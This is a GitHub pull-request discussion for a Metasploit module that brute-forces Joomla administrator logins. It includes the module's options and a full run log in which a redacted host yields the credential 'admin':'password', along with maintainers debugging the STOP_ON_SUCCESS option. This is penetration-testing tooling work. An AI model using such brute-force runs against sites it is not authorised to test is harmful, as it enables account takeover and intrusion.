### PR TITLE
Add Bruteforce Joomla

### PR DESCRIPTION
**Pull request by luisco**
Module that allows Bruteforce to Joomla 2.5 and 3.0

### CODE REVIEW

**Comment by francesco1119** [comment]
Hi,

I was testing your module, the option: STOP_ON_SUCCESS could be set on "true" or "false" but always stop when a credential works.

it's not a big issue but STOP_ON_SUCCESS is always working as "true"

**Comment by wchen-r7** [comment]
Thanks @francesco1119 , I have filed a report to track this issue:
https://github.com/rapid7/metasploit-framework/issues/5592

**Comment by void-in** [comment]
@jvazquez-r7 You tested it on Joomla 3.3 while the module description only mention 2.5 and 3.0. I think the 3.3 target should be mentioned as well since 3.x is the dominant version now.

**Comment by void-in** [comment]
@francesco1119 Can you check once again? Testing it again the STOP_ON_SUCCESS is behaving normally at my end. It is weird because I don't think someone has touched those parts of the lib that were causing the issue but that will be investigated next. First, please confirm if the issue is resolved for you. I have the latest git changes checking on master.

**Comment by francesco1119** [comment]
Unfortunately the issue is not resolved from me. Still stop when it find the password both with "false" and "true"

**Comment by void-in** [comment]
@francesco1119 Hmmm that is weird. Let me test some more.

**Comment by void-in** [comment]
Here is my output:

```ruby
msf auxiliary(joomla_bruteforce_login) > show options

Module options (auxiliary/scanner/http/joomla_bruteforce_login):

   Name              Current Setting                                                             Required  Description
   ----              ---------------                                                             --------  -----------
   AUTH_URI          /joomla25/administrator/index.php                                           yes       The URI to authenticate against
   BLANK_PASSWORDS   false                                                                       no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                           yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                       no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                       no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                       no        Add all users in the current database to the list
   FORM_URI          /joomla25/administrator                                                     yes       The FORM URI to authenticate against
   PASSWORD          password                                                                    no        A specific password to authenticate with
   PASS_FILE         /root/joomla_pass.txt                                                       no        File containing passwords, one per line
   PASS_VARIABLE     passwd                                                                      yes       The name of the variable for the password field
   Proxies                                                                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            XX.XX.XX.XX                                                                 yes       The target address range or CIDR identifier
   RPORT             80                                                                          yes       The target port
   STOP_ON_SUCCESS   true                                                                        yes       Stop guessing when a credential works for a host
   THREADS           1                                                                           yes       The number of concurrent threads
   USERNAME          admin                                                                       no        A specific username to authenticate as
   USERPASS_FILE     /opt/void-in/metasploit-framework/data/wordlists/http_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                       no        Try the username as the password for all users
   USER_FILE         /root/joomla_users.txt                                                      no        File containing users, one per line
   USER_VARIABLE     username                                                                    yes       The name of the variable for the user field
   VERBOSE           true                                                                        yes       Whether to print output for all attempts
   VHOST                                                                                         no        HTTP server virtual host
   WORD_ERROR        mod-login-username                                                          yes       The word of message for detect that login fail

msf auxiliary(joomla_bruteforce_login) > creds
Credentials
===========

host  service  public  private  realm  private_type
----  -------  ------  -------  -----  ------------

msf auxiliary(joomla_bruteforce_login) > run

[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - Searching Joomla authentication URI...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - /joomla25/administrator/index.php - Attempting to login...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Trying username:'admin' with password:'password'
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Searching Joomla Login Response...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Searching Joomla Login Form...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Testing Joomla 2.5 Form...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Searching Joomla Login Cookies...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Login with cookie
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Login Response 303
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Following redirect to http://XX.XX.XX.XX/joomla25/administrator/index.php...
[+] http://XX.XX.XX.XX:80/joomla25/administrator/index.php - Successful login 'admin' : 'password'
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [002/110] - /joomla25/administrator/index.php - Trying username:'password' with password:'password'
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [002/110] - /joomla25/administrator/index.php - Searching Joomla Login Response...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [002/110] - /joomla25/administrator/index.php - Searching Joomla Login Form...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [002/110] - /joomla25/administrator/index.php - Testing Joomla 2.5 Form...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [002/110] - /joomla25/administrator/index.php - Searching Joomla Login Cookies...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [002/110] - /joomla25/administrator/index.php - Login with cookie
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [002/110] - /joomla25/administrator/index.php - Login Response 303
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [002/110] - /joomla25/administrator/index.php - Following redirect to http://XX.XX.XX.XX/joomla25/administrator/index.php...
[-] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [002/110] - /joomla25/administrator/index.php - Failed to login as 'password'
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [003/110] - /joomla25/administrator/index.php - Trying username:'manager' with password:'password'
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [003/110] - /joomla25/administrator/index.php - Searching Joomla Login Response...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [003/110] - /joomla25/administrator/index.php - Searching Joomla Login Form...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [003/110] - /joomla25/administrator/index.php - Testing Joomla 2.5 Form...
...snip

Credentials
===========

host         service        public  private   realm  private_type
----         -------        ------  -------   -----  ------------
XX.XX.XX.XX  80/tcp (http)  admin   password         Password

msf auxiliary(joomla_bruteforce_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(joomla_bruteforce_login) > run

[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - Searching Joomla authentication URI...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - /joomla25/administrator/index.php - Attempting to login...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Trying username:'admin' with password:'password'
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Searching Joomla Login Response...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Searching Joomla Login Form...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Testing Joomla 2.5 Form...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Searching Joomla Login Cookies...
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Login with cookie
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Login Response 303
[*] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - /joomla25/administrator/index.php - Following redirect to http://XX.XX.XX.XX/joomla25/administrator/index.php...
[+] http://XX.XX.XX.XX:80/joomla25/administrator/index.php - Successful login 'admin' : 'password'
[-] XX.XX.XX.XX:80 JOOMLA_BRUTEFORCE - [001/110] - Bruteforce cancelled against this service.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(joomla_bruteforce_login) >
```
It is working fine. @wchen-r7 Did you check the brute force module STOP_ON_SUCCESS earlier?

**Comment by wchen-r7** [comment]
No, I've only read the source. And I'm not spotting the bug there.

The only plausible reason I can think of is for some reason when the Joomla login module is checking STOP_ON_SUCCESS, it's actually a String, not a TrueClass/FalseClass. That way it doesn't matter how you set it, the logic is always true anyway. However, it should never be a String, because the option should be normalized before use.

If I were him, I would do this before the ```return :abort``` statement in joomla_bruteforce_login:

```ruby
$stderr.puts datastore['STOP_ON_SUCCESS'].inspect
```

Another possible reason I can think of is maybe his ~/.msf4/config is messing with him somehow? I don't really know for sure if that's possible, but worth checking.

**Comment by francesco1119** [comment]
I don't want to copy/paste the output here but if you want I can sent it to you in a private mail

**Comment by void-in** [comment]
@wchen-r7 Yeah. That is actually a good advice. @francesco1119 Can you follow the suggestion? Just make sure datastore['STOP_ON_SUCCESS'] is actually a bool value when it is checked. Also, can you pull in the latest changes from git, then checkout this PR on top of it?

**Comment by wchen-r7** [comment]
> I don't want to copy/paste the output here but if you want I can sent it to you in a private mail

It's okay, you don't have to copy the whole output. The only thing that I'm curious most is the ```$stderr.puts``` line.

**Comment by wchen-r7** [comment]
@void-in @francesco1119 I tested the module against the the latest Joomla, and I'm not really convinced there is a bug in the handling of STOP_ON_SUCCESS. When I set it to true, it stops right after a valid credential is found, which is expected. When I set it to false, it keeps going even a valid credential is found, which is also expected.

I still suggest the same debugging steps [explained here](https://github.com/rapid7/metasploit-framework/pull/3532#issuecomment-115553415).

If you would like to e-mail the whole output, you can e-mail it to msfdev[at]metasploit.com. Please note that if we suspect you are trying against a live website without permission, we will not be allowed to assist you any further.

Thanks.

**Comment by wchen-r7** [comment]
@francesco1119 Also, when you use the module, please make sure to do ```set VERBOSE true```. If you don't do that, the module won't print unsuccessful messages, which could make it feel like STOP_ON_SUCCESS is always true.

**Comment by void-in** [comment]
@wchen-r7 Yup. Same as me. I am getting the expected behavior as well.

**Comment by francesco1119** [comment]
OK, the site is mine, thet's why I didn't wanted to copy/paste the ip address and other info. I will do that in the next hours.

**Pull request merged**
